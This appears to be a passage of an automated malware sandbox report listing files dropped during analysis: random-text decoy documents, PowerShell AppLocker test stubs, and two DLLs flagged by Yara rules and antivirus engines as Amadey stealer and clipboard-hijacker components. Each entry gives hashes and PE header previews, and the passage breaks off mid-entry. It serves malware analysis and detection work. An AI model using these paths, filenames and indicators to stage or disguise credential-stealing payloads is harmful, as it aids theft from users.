                                                                                                    Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\JSDNGYCOWY.docx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690895772725941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                    MD5:A002E80B55673139253599B753BDC01A
                                                                                                    SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                    SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                    SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                    Malicious:false
                                                                                                    Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\JSDNGYCOWY.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690895772725941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                    MD5:A002E80B55673139253599B753BDC01A
                                                                                                    SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                    SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                    SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                    Malicious:false
                                                                                                    Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\KZWFNRXYKI.docx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                    Malicious:false
                                                                                                    Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\NIKHQAIQAU.docx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690394987545919
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                    MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                    SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                    SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                    SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                    Malicious:false
                                                                                                    Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\NIKHQAIQAU.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690394987545919
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                    MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                    SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                    SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                    SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                    Malicious:false
                                                                                                    Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\RAYHIWGKDI.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.69782189124949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                    MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                    SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                    SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                    SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                    Malicious:false
                                                                                                    Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\ZBEDCJPBEY.docx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.6994061563025005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                    MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                    SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                    SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                    SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                    Malicious:false
                                                                                                    Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxo5w0te.hch.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iy0vblow.bxf.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyswlnas.cwc.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qprtmgnp.q1a.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112128
                                                                                                    Entropy (8bit):6.400158525810517
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                    MD5:726CD06231883A159EC1CE28DD538699
                                                                                                    SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                    SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                    SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                    • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L...j..e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1285632
                                                                                                    Entropy (8bit):6.460494158653329
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                    MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                    SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
